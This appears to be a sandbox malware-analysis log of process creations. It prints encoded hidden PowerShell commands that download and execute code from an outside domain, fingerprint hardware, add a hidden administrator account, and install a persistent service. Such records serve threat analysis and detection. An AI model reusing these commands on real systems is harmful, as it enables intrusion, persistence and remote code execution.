        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        Source: unknownProcess created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
        Source: unknownProcess created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe cakoi10
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHJump to behavior
